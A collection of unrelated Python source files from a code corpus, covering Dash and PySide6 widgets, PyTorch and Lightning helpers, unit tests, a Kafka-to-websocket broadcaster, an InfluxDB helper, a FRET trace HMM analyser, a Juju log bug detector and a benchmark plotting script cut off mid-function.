"Development Status :: 4 - Beta",
"Environment :: Other Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Internet"
],
long_description="""\
Needs
-----
Boolean contexts. A pythonic way of expressing what your code needs
"""
)
| StarcoderdataPython |
1749818 | <gh_stars>1-10
import dash_mantine_components as dmc
from dash import Output, Input, callback
component = dmc.MultiSelect(
data=["USDINR", "EURUSD", "USDTWD", "USDJPY"],
id="multi-select-error",
value=["USDJPY"],
style={"width": 400},
)
@callback(Output("multi-select-error", "error"), Input("multi-select-error", "value"))
def select_value(value):
return "Select at least 2." if len(value) < 2 else ""
| StarcoderdataPython |
106883 | <gh_stars>100-1000
""" Mixins for nn.Modules for better textual visualization. """
from textwrap import indent
class LayerReprMixin:
""" Adds useful properties and methods for nn.Modules, mainly related to visualization and introspection. """
VERBOSITY_THRESHOLD = 10
@property
def num_frozen_parameters(self):
return sum(p.numel() for p in self.parameters() if not p.requires_grad)
@property
def num_trainable_parameters(self):
return sum(p.numel() for p in self.parameters() if p.requires_grad)
@property
def num_parameters(self):
return sum(p.numel() for p in self.parameters())
def __repr__(self):
if hasattr(self, 'verbosity') and self.verbosity < self.VERBOSITY_THRESHOLD:
return ''
msg = super().__repr__()
if getattr(self, 'collapsible', False):
msg = msg.replace('(\n (layer): ', ':').replace('\n ', '\n ')
msg = msg.replace('\n )\n)', '\n)').replace(')\n)', ')')
return msg
def prepare_repr(self, verbosity=1, collapsible=True, show_num_parameters=False, extra=False):
""" Set flags on children, call `repr`, delete flags.
Returns string.
"""
def set_flags(module):
setattr(module, 'verbosity', verbosity)
setattr(module, 'collapsible', collapsible)
setattr(module, 'show_num_parameters', show_num_parameters)
setattr(module, 'extra', extra)
def del_flags(module):
try:
delattr(module, 'verbosity')
delattr(module, 'collapsible')
delattr(module, 'show_num_parameters')
delattr(module, 'extra')
except AttributeError:
pass
self.apply(set_flags)
msg = repr(self)
self.apply(del_flags)
return msg
def repr(self, verbosity=1, collapsible=True, show_num_parameters=False, extra=False):
""" Set flags on children, call `repr`, delete flags.
Prints output to stdout.
"""
print(self.prepare_repr(verbosity=verbosity, collapsible=collapsible,
show_num_parameters=show_num_parameters, extra=extra))
class ModuleDictReprMixin(LayerReprMixin):
""" Mixin to allow `repr` for multiple levels for nn.ModuleDicts.
Also adds `__getitem__` for convenience.
Relies on modules having `shapes` dictionary, that for each children stores the information about their
input and output shapes.
Depending on `verbosity`, creates string representation for different levels:
- verbosity 1, modules and their shapes. For example, shapes of `initial_block`, `body` and `head`.
- verbosity 2, blocks inside modules. For example, shapes of blocks inside Encoder.
- verbosity 3, blocks inside repeated chains of `:class:~.blocks.Block`. Mainly used for debug purposes.
- verbosity 4, letters inside each `:class:~.layers.MultiLayer`. For example, each letter inside given block.
- verbosity 5, PyTorch implementations of each letter inside `:class:~.layers.MultiLayer`.
- verbosity 6+, default repr of nn.Module.
For most cases, levels 2 and 4 should be used.
Additional parameters can be used to show number of parameters inside each level and collapse multilines.
"""
def __getitem__(self, key):
if isinstance(key, int):
key = list(self.keys())[key]
return super().__getitem__(key)
def prepare_shape(self, shape, indent=0):
""" Beautify shape or list of shapes.
Changes the first dimension (batch) to `?`.
Makes multiple lines for lists of shapes with provided indentation.
"""
#pylint: disable=redefined-outer-name
if isinstance(shape, tuple):
msg = ', '.join([f'{item:>3}' for item in shape[1:]])
return f' (?, {msg}) '
if isinstance(shape, list):
msg = '[' + self.prepare_shape(shape[0])[1:-1] + ','
for shape_ in shape[1:]:
msg += '\n ' + ' '*indent + self.prepare_shape(shape_)[1:-1] + ','
msg = msg[:-1] + ']'
return msg
raise TypeError(f'Should be used on tuple or list of tuples, got {type(shape)} instead.')
def __repr__(self):
if hasattr(self, 'verbosity'):
indent_prefix = ' '
# Parse verbosity. If equal to max level, set flag
verbosity = self.verbosity
if verbosity >= 5:
verbosity = 4
detailed_last_level = True
else:
detailed_last_level = False
if len(self.keys()):
key = list(self.keys())[0]
input_shapes, output_shapes = None, None
if (len(self.items()) == 1 and getattr(self, 'collapsible', False)
and getattr(self[key], 'VERBOSITY_THRESHOLD', -1) == self.VERBOSITY_THRESHOLD):
# Subclasses names can be folded, i.e. `Block:ResBlock(` instead of `Block(\n ResBlock(`
msg = self._get_name() + ':' + repr(self[key])
msg = msg.replace(')\n)', ')')
else:
msg = self._get_name() + '(\n'
extra_repr = self.extra_repr()
if extra_repr:
msg += indent(extra_repr, prefix=indent_prefix) + '\n'
max_key_length = max(len(key) for key in self.keys())
for key, value in self.items():
# Short description: module name and description of shapes
empty_space = ' ' * (1 + max_key_length - len(key))
module_short_description = f'({key}:{empty_space}'
if key in self.shapes:
input_shapes, output_shapes = self.shapes.get(key)
current_line_len = len(module_short_description)
input_shapes = self.prepare_shape(input_shapes, indent=current_line_len)
module_short_description += input_shapes + ' ⟶ '
current_line_len = len(module_short_description.splitlines()[-1]) + 1
output_shapes = self.prepare_shape(output_shapes, indent=current_line_len).strip(' ')
module_short_description += output_shapes
if getattr(self, 'show_num_parameters', False):
num_parameters = sum(p.numel() for p in value.parameters() if p.requires_grad)
module_short_description += f', #params={num_parameters:,}'
module_short_description += ')'
# Long description: ~unmodified repr of a module
module_long_description = repr(value).strip(' ')
# Select appropriate message
module_description = ''
if verbosity > self.VERBOSITY_THRESHOLD:
module_description = f'({key}): ' + module_long_description
if verbosity == self.VERBOSITY_THRESHOLD or module_description == f'({key}): ':
module_description = module_short_description
if self.VERBOSITY_THRESHOLD == 4 and detailed_last_level:
module_description = (module_short_description + ':\n' +
indent(module_long_description, prefix=indent_prefix))
msg += indent(module_description, prefix=indent_prefix) + '\n'
msg = msg.replace('\n\n', '\n')
msg += ')'
if len(self.items()) == 1 and getattr(self, 'collapsible', False) and 'r0' in msg:
msg = msg.replace('(\n (r0:', '(r0:', 1)
msg = msg.replace(')\n)', ')')
else:
msg = self._get_name() + '()'
return msg
return super().__repr__()
REPR_DOC = '\n'.join(ModuleDictReprMixin.__doc__.split('\n')[3:])
LayerReprMixin.repr.__doc__ += '\n' + REPR_DOC
LayerReprMixin.prepare_repr.__doc__ += '\n' + REPR_DOC
| StarcoderdataPython |
1704079 | import os
import pytest
from click.testing import CliRunner
from paths_cli.commands.append import *
import openpathsampling as paths
def make_input_file(tps_network_and_traj):
input_file = paths.Storage("setup.nc", mode='w')
for obj in tps_network_and_traj:
input_file.save(obj)
input_file.tags['template'] = input_file.snapshots[0]
input_file.close()
return "setup.nc"
def test_append(tps_network_and_traj):
runner = CliRunner()
with runner.isolated_filesystem():
in_file = make_input_file(tps_network_and_traj)
result = runner.invoke(append, [in_file, '-a', 'output.nc',
'--volume', 'A', '--volume', 'B'])
assert result.exception is None
assert result.exit_code == 0
storage = paths.Storage('output.nc', mode='r')
assert len(storage.volumes) == 2
assert len(storage.snapshots) == 0
storage.volumes['A'] # smoke tests that we can load
storage.volumes['B']
storage.close()
result = runner.invoke(append, [in_file, '-a', 'output.nc',
'--tag', 'template'])
storage = paths.Storage('output.nc', mode='r')
assert len(storage.volumes) == 2
assert len(storage.snapshots) == 2 # one snapshot + reverse
@pytest.mark.parametrize('n_objects', [0, 2])
def test_append_tag_error(tps_network_and_traj, n_objects):
objs = {2: ['--volume', "A", '--volume', "B"], 0: []}[n_objects]
runner = CliRunner()
with runner.isolated_filesystem():
in_file = make_input_file(tps_network_and_traj)
result = runner.invoke(append,
[in_file, '-a', "output.nc"] + objs
+ ["--save-tag", "foo"])
assert isinstance(result.exception, RuntimeError)
assert "Can't identify the object to tag" in str(result.exception)
def test_append_tag(tps_network_and_traj):
runner = CliRunner()
with runner.isolated_filesystem():
in_file = make_input_file(tps_network_and_traj)
result = runner.invoke(append,
[in_file, '-a', "output.nc",
'--tag', 'template', '--save-tag', 'foo'])
assert result.exit_code == 0
assert result.exception is None
storage = paths.Storage("output.nc", mode='r')
assert len(storage.snapshots) == 2
assert len(storage.tags) == 1
assert storage.tags['foo'] is not None
storage.close()
def test_append_same_tag(tps_network_and_traj):
runner = CliRunner()
with runner.isolated_filesystem():
in_file = make_input_file(tps_network_and_traj)
result = runner.invoke(append,
[in_file, '-a', "output.nc",
'--tag', 'template'])
assert result.exit_code == 0
assert result.exception is None
storage = paths.Storage("output.nc", mode='r')
assert len(storage.snapshots) == 2
assert len(storage.tags) == 1
assert storage.tags['template'] is not None
storage.close()
def test_append_remove_tag(tps_network_and_traj):
runner = CliRunner()
with runner.isolated_filesystem():
in_file = make_input_file(tps_network_and_traj)
result = runner.invoke(append,
[in_file, '-a', "output.nc",
"--tag", 'template', '--save-tag', ''])
assert result.exception is None
assert result.exit_code == 0
storage = paths.Storage("output.nc", mode='r')
assert len(storage.snapshots) == 2
assert len(storage.tags) == 0
storage.close()
| StarcoderdataPython |
1754397 | from PySide6.QtCore import QPoint, Qt, Signal
from PySide6.QtGui import QIntValidator
from PySide6.QtWidgets import QHBoxLayout, QLineEdit, QSizePolicy, QSlider, QToolTip, QWidget, QApplication
class QRangeL(QLineEdit):
newValue = Signal()
def __init__(self, min=0, max=100, value = 0):
super().__init__()
self._min = min
self._max = max
self.value = value
self.setValidator(QIntValidator(self._min, self._max))
self.inputRejected.connect(self._updateValue)
self.textEdited.connect(self._updateValue)
self._updateTootlTip()
def _updateTootlTip(self):
self.setToolTip(f'{self._min}..{self._max}')
def _updateValue(self):
val = ''.join(filter(str.isdigit, self.text()))
if not self.hasAcceptableInput():
QToolTip.showText(self.mapToGlobal(QPoint(0, 10)), self.toolTip(), msecShowTime=2000)
if val != '':
self.value = int(val)
else:
if val != '':
self.value = int(val)
@property
def value(self) -> int:
val = ''.join(filter(str.isdigit, self.text()))
if val != '':
return int(val)
return None
@value.setter
def value(self, value:int = 0):
if value > self.max:
value = self.max
elif value < self.min:
value = self.min
self.setText(str(value))
self.newValue.emit()
@property
def min(self) -> int:
return self._min
@min.setter
def min(self, min:int = 0):
if min > self.value:
self.value = min
self._min = min
self._updateTootlTip()
self.setValidator(QIntValidator(self._min, self._max))
@property
def max(self) -> int:
return self._max
@max.setter
def max(self, max:int = 100):
if max < self.value:
self.value = max
self._max = max
self._updateTootlTip()
self.setValidator(QIntValidator(self._min, self._max))
class QRangeLS(QWidget):
newValue = Signal()
def __init__(self, min=0, max=100, value=0, lineStrech = 1, sliderStrech = 4):
super().__init__()
self.line = QRangeL()
self.line.newValue.connect(self.line_new_value)
policy = QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Fixed)
policy.setHorizontalStretch(lineStrech)
self.line.setSizePolicy(policy)
self.slider = QSlider(Qt.Horizontal)
self.slider.valueChanged.connect(self.slider_new_value)
policy.setHorizontalStretch(sliderStrech)
self.slider.setSizePolicy(policy)
self.slider.setPageStep(1)
self.layout = QHBoxLayout()
self.layout.setContentsMargins(0, 0, 0, 0)
self.layout.addWidget(self.line)
self.layout.addWidget(self.slider)
self.setLayout(self.layout)
self.min = min
self.max = max
self.value = value
def line_new_value(self):
self.slider.setValue(self.line.value)
self.newValue.emit()
def slider_new_value(self):
self.line.value = self.slider.value()
self.newValue.emit()
@property
def value(self) -> int:
return self.line.value
@value.setter
def value(self, value:int = 0):
self.line.value = value
self.slider.setValue(self.line.value)
@property
def min(self) -> int:
return self.line.min
@min.setter
def min(self, min:int = 0):
self.line.min = min
self.slider.setMinimum(self.line.min)
@property
def max(self) -> int:
return self.line.max
@max.setter
def max(self, max:int = 100):
self.line.max = max
self.slider.setMaximum(self.line.max)
class Window(QWidget):
def __init__(self):
super(Window, self).__init__()
layout = QHBoxLayout()
ls = QRangeLS()
layout.addWidget(ls)
self.setLayout(layout)
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
window = Window()
window.show()
app.exec() | StarcoderdataPython |
3323271 | import websockets
import asyncio
import time
from .kafka_consumers import async_kafka
# {topic_id: KafkaConsumer}
broadcaster_lock = asyncio.Lock()
topic_broadcasters = {}
# {topic_id: [ClientHandler, ClientHandler ...]}
subscriptions_lock = asyncio.Lock()
client_subscriptions = {}
tasks_lock = asyncio.Lock()
tasks = {}
published_lock = asyncio.Lock()
n_published = 0
async def subscribe(topic_id: str, client):
async with broadcaster_lock:
async with subscriptions_lock:
if topic_id not in topic_broadcasters.keys():
assert topic_id not in client_subscriptions.keys()
consumer = await async_kafka.get_consumer(topic_id)
if not consumer:
subscriptions_lock.release()
broadcaster_lock.release()
return
topic_broadcasters[topic_id] = consumer
client_subscriptions[topic_id] = [client]
task = asyncio.create_task(run_topic(topic_id))
async with tasks_lock:
tasks[topic_id] = task
else:
client_subscriptions[topic_id].append(client)
async def unsubscribe(topic_id: str, client):
async with broadcaster_lock:
async with subscriptions_lock:
if client not in client_subscriptions[topic_id]:
print(f"client is not subscribed to {topic_id}")
return
client_subscriptions[topic_id].remove(client)
if len(client_subscriptions[topic_id]) == 0:
await async_kafka.shutdown_topic(topic_id)
del client_subscriptions[topic_id]
del topic_broadcasters[topic_id]
async with tasks_lock:
tasks[topic_id].cancel()
del tasks[topic_id]
async def run_topic(topic_id):
global n_published
async for msg in topic_broadcasters[topic_id]:
subs = client_subscriptions[topic_id]
sockets = map(lambda client: client.get_ws(), subs)
websockets.broadcast(sockets, msg)
async with published_lock:
n_published += 1
async def shutdown():
async with tasks_lock:
for task in tasks:
task.cancel()
def debug():
print(f"---------------ts: {int(time.time())}---------------")
print(f"Messages Broadcasted: {n_published}")
print(f"Broadcasters: {topic_broadcasters}")
print(f"Subscribers: {client_subscriptions}")
print(f"--------------------------------------------\n") | StarcoderdataPython |
1623951 | <filename>osx/test/test_cfarray.py
##
# Copyright (c) 2010-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
from ..corefoundation import CFArrayRef, CFStringRef
import gc
import unittest
"""
CFArrayRef tests.
"""
class CFArrayRefTestCase(unittest.TestCase):
"""
Tests for L{CFArrayRef}.
"""
def test_typeid(self):
"""
Make sure L{CFArrayRef.instanceTypeId} returns the right value.
"""
array = CFArrayRef.fromList((CFStringRef.fromString("abc"), CFStringRef.fromString("def"),))
self.assertEqual(array.instanceTypeId(), CFArrayRef.typeId())
def test_description(self):
"""
Make sure L{CFArrayRef.description} is the correct string.
"""
array = CFArrayRef.fromList((CFStringRef.fromString("abc"), CFStringRef.fromString("def"),))
self.assertTrue("CFArray" in array.description(), msg=array.description())
def test_retain(self):
"""
Make sure L{CFArrayRef.retainCount} returns the correct value based on ownership.
"""
array1 = CFArrayRef.fromList((CFStringRef.fromString("abc"), CFStringRef.fromString("def"),))
self.assertEqual(array1.retainCount(), 1)
array2 = CFArrayRef(array1.ref(), owned=False)
self.assertEqual(array1.retainCount(), 2)
self.assertEqual(array2.retainCount(), 2)
del array1
gc.collect()
self.assertEqual(array2.retainCount(), 1)
def test_to_from_list(self):
"""
Make sure L{CFArrayRef.fromString} and L{CFArrayRef.toString} work properly.
"""
array = CFArrayRef.fromList((CFStringRef.fromString("abc"), CFStringRef.fromString("def"),))
self.assertEqual(array.toList(), ["abc", "def", ])
def test_count(self):
"""
Make sure L{CFArrayRef.count} returns the right number.
"""
array = CFArrayRef.fromList((CFStringRef.fromString("abc"), CFStringRef.fromString("def"),))
self.assertEqual(array.count(), 2)
def test_valueAt(self):
"""
Make sure L{CFArrayRef.valueAtIndex} returns the right number.
"""
array = CFArrayRef.fromList((CFStringRef.fromString("abc"), CFStringRef.fromString("def"),))
self.assertEqual(array.valueAtIndex(0), "abc")
self.assertEqual(array.valueAtIndex(1), "def")
| StarcoderdataPython |
43023 |
def is_black(x):
return x == '#'
def is_square(box, N):
size = None
fbj1 = None
fbj2 = None
fbi1 = None
fbi2 = None
blank = "."*N
for i in xrange(0, N):
for j in xrange(0, N):
if fbj1 is None or fbj2 is None:
if is_black(box[i][j]):
if fbj1 is None:
fbj1 = j
fbi1 = i
elif j == N-1:
fbj2 = j
fbi2 = fbi1 + fbj2 - fbj1
else:
if fbj1 is not None:
fbj2 = j-1
fbi2 = fbi1 + fbj2 - fbj1
else:
if is_black(box[i][j]):
if (j < fbj1 or j > fbj2) or i - fbi1 > fbj2 - fbj1:
return False
else:
if fbj1 <= j <= fbj2 and i - fbi1 <= fbj2 - fbj1:
return False
return fbj1 is not None
with open("input1.txt") as f:
T = int(f.readline())
for t in xrange(0, T):
N = int(f.readline())
c = []
for i in xrange(0, N):
c.append(f.readline().rstrip('\n'))
print "Case #%d: %s" % (t+1,
"YES" if is_square(c, N) else "NO")
| StarcoderdataPython |
4813762 | <reponame>asymworks/fitbit2influx<gh_stars>0
# Fitbit2InfluxDB Influx Connection
import influxdb
class InfluxDB(object):
'''InfluxDB Helper for Flask'''
def __init__(self, app=None):
self._client = None
self.app = app
if app:
self.init_app(app)
def init_app(self, app):
'''Setup the InfluxDB Connection'''
client_args = {
'host': app.config.get('INFLUX_HOST', 'localhost'),
'port': app.config.get('INFLUX_PORT', 8086),
'database': app.config.get('INFLUX_DATABASE', None),
'username': app.config.get('INFLUX_USERNAME', None),
'password': app.config.get('INFLUX_PASSWORD', None),
'ssl': app.config.get('INFLUX_SSL', False),
'verify_ssl': app.config.get('INFLUX_VERIFY_SSL', False),
}
self._client = influxdb.InfluxDBClient(**client_args)
self.app = app
self.app.influx = self
@property
def client(self):
return self._client
#: InfluxDB Client
influx = InfluxDB()
def init_app(app):
'''Initialize the InfluxDB Connection'''
influx.init_app(app)
app.logger.info('Initialized InfluxDB')
| StarcoderdataPython |
185980 | <reponame>stephlj/smFRETcode<filename>extras/pyhsmm_for_Traces/fret.py<gh_stars>1-10
from __future__ import division
import numpy as np
from scipy.io import loadmat, savemat
from scipy.stats import scoreatpercentile
import matplotlib.pyplot as plt
import os
from os.path import join, splitext, isfile, basename
from pyhsmm.models import WeakLimitStickyHDPHMM
from pyhsmm.basic.distributions import Gaussian
from pyhsmm.util.stats import cov
from config import getdirs
class Trace(object):
'''
A container object for trace experiments.
'''
def __init__(self,matfilepath,start=0,end=None):
self.matfilepath = matfilepath
self.start = int(start)
self.end = int(end) if end is not None else None
self.name = _name_from_matfilepath(matfilepath)
# load matfile
mat = loadmat(matfilepath)
# add model_data
self.model_data = \
np.hstack((mat['unsmoothedGrI'].T,mat['unsmoothedRedI'].T)
)[self.start:self.end]
# we start out with no model
self.model = None
# add everything from the matlab dict to this instance
for k, v in mat.items():
if not k.startswith('__'):
self.__dict__[k] = np.squeeze(v)
### model fitting
def run_gibbs(self,niter):
if self.model is None:
self.reset_model()
for itr in xrange(niter):
self.model.resample_model()
self.model.states_list[0].Viterbi()
def reset_model(self):
self.model = self._make_model()
self.model.add_data(self.model_data)
def _make_model(self):
data = self.model_data
# The parameters are:
# Gaussian observation distributions (ellipses in red-green intensity space)
# mu_0 and sigma parameterize our prior belief about the means and sigma of each state
# nu_0 expresses your confidence in the prior--it's the number of data points that
# you claim got you these prior parameters. Nu_0 has to be strictly bigger than the
# number of dimensions (2, in our case). You could do 2.01.
# The nominal covariance is sigma_0/nu_0, so hence the 3 in sigma_0.
# kappa_0: Uncertainty in the mean should be related to uncertainty in the covariance.
# kappa_0 is an amplitude for that. Smaller number means other states' means will be
# further away.
obs_hypparams = dict(
mu_0=data.mean(0),
sigma_0=3.*cov(data),
nu_0=3.,
kappa_0=0.5,
)
# In the function call below:
# (1) alpha and gamma bias how many states there are. We're telling it to expect
# one state (conservative)
# (2) kappa controls the self-transition bias. Bigger number means becomes more expensive
# for states to non-self-transition (that is, change to a different state).
model = WeakLimitStickyHDPHMM(
alpha=1.,gamma=1.,init_state_distn='uniform',
kappa=500.,
obs_distns=[Gaussian(**obs_hypparams) for _ in range(10)],
)
return model
### model fit results
@property
def model_stateseq(self):
return self.model.stateseqs[0]
@property
def model_durations(self):
return self.model.durations[0]
@property
def model_stateseq_norep(self):
return self.model.stateseqs_norep[0]
@property
def model_redgreenseq(self):
# construct corresponding mean sequence
m = self.model
return np.array([m.obs_distns[state].mu for state in self.model_stateseq])
@property
def model_fretseq(self):
g, r = self.model_redgreenseq.T
return r/(r+g)
### plotting
def model_fretplot(self):
raw_g, raw_r = self.unsmoothedGrI, self.unsmoothedRedI
raw_fretseq = raw_r/(raw_r+raw_g)
t_model = np.arange(self.start, self.end if self.end is not None else self.unsmoothedGrI.shape[0])
g, r = self.model_redgreenseq.T
fretseq = r/(r+g)
fig, (ax1, ax2) = plt.subplots(2,1,figsize=(12,6), sharex=True)
plt.subplot(ax1)
# plt.title('intensities')
fig.suptitle(self.name)
# plot raw values
plt.plot(raw_g,'g-',alpha=0.5)
plt.plot(raw_r,'r-',alpha=0.5)
# plot model values
plt.plot(t_model,g,'g--',linewidth=2)
plt.plot(t_model,r,'r--',linewidth=2)
plt.xlabel('Frame')
plt.ylabel('Intensity (a.u.)')
plt.subplot(ax2)
# plt.title('fret values')
# plot raw values
plt.plot(raw_fretseq,'k-',alpha=0.5)
# plot model values
plt.plot(t_model,fretseq,'b-')
# set ylim to handle outliers
plt.ylim(scoreatpercentile(raw_fretseq,5)-0.2,scoreatpercentile(raw_fretseq,95)+0.2)
plt.xlabel('Frame')
plt.ylabel('FRET')
plt.xlim(0,raw_g.shape[0])
# fig.suptitle(self.name)
### saving to matfile
def save_matfile(self,matfiledir=None):
if matfiledir is None:
mkdir('Results')
matfilepath = join('Results',self.name+'Results')
else:
matfilepath = join(matfiledir,self.name+'_Results')
tosave = ['start','unsmoothedGrI','unsmoothedRedI',
'rawGrI','rawRedI','unsmoothedFRET','FRET','RedI','GrI',
'model_data','fps','t_Inj']
mdict = {key:self.__dict__[key] for key in tosave}
mdict.update({
'model_stateseq':self.model_stateseq,
'model_stateseq_norep':self.model_stateseq_norep,
'model_durations':self.model_durations,
'model_redgreenseq':self.model_redgreenseq,
'model_fretseq':self.model_fretseq,
})
savemat(matfilepath,mdict)
def load_experiment(expname,datadir=None,resultsdir=None):
'''
Given an experiment name, returns a dict where keys are trace names and
values are corresponding Traces.
Reads the experiment's 'goodtraces.txt' file, if it exists, and only
includes in the returned dict traces whose lines do not start with '#'.
# Example #
traces = load_experiment('wtWB')
model.add_data(traces['Spot1_186_141208'].model_data)
'''
default_datadir, default_resultsdir = getdirs()
datadir = datadir if datadir is not None else default_datadir
resultsdir = resultsdir if resultsdir is not None else default_resultsdir
goodfile = join(resultsdir,expname,'goodtraces.txt')
if isfile(goodfile):
# parse goodtraces.txt, create corresponding Traces
with open(goodfile,'r') as infile:
lines = infile.readlines()
traces = {}
for l in lines:
if not l.startswith('#'):
# This line gets the filename, splitting off anything after a whitespace
matfilepath = join(datadir,l.split()[0])
name = _name_from_matfilepath(matfilepath)
kwds = dict(pair.split('=') for pair in l.split()[1:])
traces[name] = Trace(matfilepath, **kwds)
return traces
else:
raise ValueError('Did not find goodtraces file: %s' % goodfile)
def load_trace(datadir,tracename):
'''
Given a trace name, returns the corresponding Trace object.
# Example #
trace = load_trace('Spot1_186_141208')
model.add_data(trace.model_data)
'''
# Turn the _ in the original name back into an /
tempname = tracename.split('_Spot',1)
tracefilename = 'Spot' + tempname[1] + '.mat'
datasubdir = join(datadir,tempname[0])
for root, dirnames, filenames in os.walk(datasubdir):
for filename in filenames:
if filename == tracefilename:
return Trace(join(root,filename))
def _name_from_matfilepath(f):
assert not f.endswith('/')
rest, filename = os.path.split(f)
_, dirname = os.path.split(rest)
spot_id, _ = splitext(filename)
return dirname + '_' + spot_id
def mkdir(path):
# from http://stackoverflow.com/questions/600268/mkdir-p-functionality-in-python
import errno
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
| StarcoderdataPython |
1794299 | <reponame>amazingguni/flask-ddd
from app.catalog.domain.category import Category
from app.catalog.domain.product import Product
from app.catalog.infra.repository.sql_product_repository import SqlProductRepository
def test_save(db_session):
# Given
product = Product(name='꼬북칩', price=1000, detail='바삭하고 맛이 있지요')
# When
SqlProductRepository(db_session).save(product)
# Then
assert db_session.query(Product).first().name == '꼬북칩'
def test_save_with_categories(db_session):
# Given
product = Product(name='꼬북칩', price=1000, detail='바삭하고 맛이 있지요')
product.categories.append(Category(name='제과'))
product.categories.append(Category(name='어린이'))
# When
SqlProductRepository(db_session).save(product)
# Then
result_product = db_session.query(Product).first()
assert result_product.name == '꼬북칩'
assert len(result_product.categories) == 2
assert set([category.name for category in result_product.categories]) == \
set(['제과', '어린이'])
def test_remove_by_id(db_session):
# Given
product = Product(name='꼬북칩', price=1000, detail='바삭하고 맛이 있지요')
db_session.add(product)
db_session.commit()
assert db_session.query(Product).count() == 1
# When
SqlProductRepository(db_session).remove_by_id(product.id)
# Then
assert db_session.query(Product).count() == 0
def test_find_all(db_session):
# Given
for i in range(1, 6):
db_session.add(
Product(name=f'꼬북칩 {i}', price=1000, detail='바삭하고 맛이 있지요'))
db_session.commit()
# When
result = SqlProductRepository(db_session).find_all()
# Then
assert len(result) == 5
def test_find_by_id(db_session):
# Given
for i in range(1, 6):
db_session.add(
Product(name=f'꼬북칩 {i}', price=1000, detail='바삭하고 맛이 있지요'))
db_session.commit()
# When
result = SqlProductRepository(db_session).find_by_id(2)
# Then
assert result.id == 2
assert result.name == '꼬북칩 2'
def test_find_by_category(pre_data_db_session):
repository = SqlProductRepository(pre_data_db_session)
category_1 = pre_data_db_session.query(
Category).filter(Category.name == '전자제품').first()
category_2 = pre_data_db_session.query(
Category).filter(Category.name == '필기구').first()
# When
category_1_products = repository.find_by_category(category_1, 0, 10)
category_2_products = repository.find_by_category(category_2, 0, 10)
# Then
assert len(category_1_products) == 2
assert len(category_2_products) == 2
def test_counts_by_category(db_session):
repository = SqlProductRepository(db_session)
category_1 = Category(name='제과')
category_2 = Category(name='아동')
db_session.add_all([category_1, category_2])
db_session.commit()
for i in range(1, 6):
db_session.add(
Product(name=f'꼬북칩 {i}', price=1000, detail='바삭하고 맛이 있지요', categories=[category_1, category_2]))
for i in range(1, 21):
db_session.add(
Product(name=f'장난감 {i}', price=2000, detail='재미있지요', categories=[category_2]))
# When
assert repository.counts_by_category(category_1) == 5
assert repository.counts_by_category(category_2) == 25
| StarcoderdataPython |
1677936 | <filename>src/lightning_callbacks/rec_err_evaluator.py
import torch
from pytorch_lightning.callbacks import Callback
from pytorch_lightning import Trainer
from lightning_modules.base_generative_module import BaseGenerativeModule
from metrics.rec_err import mean_per_image_se
class RecErrEvaluator(Callback):
def on_validation_batch_end(
self,
_trainer: Trainer,
pl_module: BaseGenerativeModule,
outputs: tuple[torch.Tensor, torch.Tensor],
batch: torch.Tensor,
_batch_idx: int,
_dataloader_idx: int) -> None:
output_images = outputs[1]
assert batch.size() == output_images.size()
batch = batch.to(pl_module.device)
rec_err = mean_per_image_se(batch, output_images)
pl_module.log('rec_err', rec_err, prog_bar=False, on_epoch=True)
| StarcoderdataPython |
3203824 | #1: Syntax Errors
def helloworld():
return 'Hello World!'
#2: Runtime Errors
def math(b,c):
return 10//b + 10//c+10
#3: Logic Errors
def ticketbooth(age):
return 'Free ticket!' if 5 < age < 10 else 'You gotta pay!'
| StarcoderdataPython |
199844 | <reponame>Riteme/test<filename>oi/51nod/P1065/gen.py<gh_stars>1-10
#!/usr/bin/env pypy
from sys import argv
from random import *
n, m = map(int, argv[1:])
print n
print " ".join(map(str, [randint(-m, m) for i in xrange(n)]))
| StarcoderdataPython |
3277371 | #!/usr/bin/python3
from common import (
constants,
)
from common.searchtools import (
FileSearcher,
)
from common.known_bugs_utils import (
add_known_bug,
BugSearchDef,
)
from juju_common import (
JUJU_LOG_PATH
)
# NOTE: only LP bugs supported for now
BUG_SEARCHES = [
BugSearchDef(
(r'.* manifold worker .+ error: failed to initialize uniter for '
r'"(\S+)": cannot create relation state tracker: cannot remove '
r'persisted state, relation (\d+) has members'),
bug_id="1910958",
hint="manifold worker returned unexpected error",
reason=("Unit {} failed to start due to members in relation {} that "
"cannot be removed."),
reason_value_render_indexes=[1, 2],
),
]
def detect_known_bugs():
"""Unit fails to start complaining there are members in the relation."""
data_source = f"{JUJU_LOG_PATH}/*.log"
if constants.USE_ALL_LOGS:
data_source = f"{data_source}*"
s = FileSearcher()
for bugdef in BUG_SEARCHES:
s.add_search_term(bugdef, data_source)
results = s.search()
for bugdef in BUG_SEARCHES:
bug_results = results.find_by_tag(bugdef.tag)
if bug_results:
reason = bugdef.render_reason(bug_results[0])
add_known_bug(bugdef.tag, reason)
if __name__ == "__main__":
detect_known_bugs()
| StarcoderdataPython |
3340497 | <reponame>asonnino/key-transparency<filename>scripts/benchmark/plot.py
from collections import defaultdict
from re import findall, search, split
import matplotlib.pyplot as plt
import matplotlib.ticker as tick
from glob import glob
from itertools import cycle
from benchmark.utils import PathMaker
from benchmark.config import PlotParameters
from benchmark.aggregate import LogAggregator
@tick.FuncFormatter
def default_major_formatter(x, pos):
if pos is None:
return
if x >= 1_000:
return f'{x/1000:.0f}k'
else:
return f'{x:.0f}'
@tick.FuncFormatter
def sec_major_formatter(x, pos):
if pos is None:
return
return f'{float(x)/1000:.1f}'
# return f'{x:,.0f}'
@tick.FuncFormatter
def mb_major_formatter(x, pos):
if pos is None:
return
return f'{x:,.0f}'
class PlotError(Exception):
pass
class Ploter:
def __init__(self, filenames):
if not filenames:
raise PlotError('No data to plot')
self.results = []
try:
for filename in filenames:
with open(filename, 'r') as f:
self.results += [f.read().replace(',', '')]
except OSError as e:
raise PlotError(f'Failed to load log files: {e}')
def _natural_keys(self, text):
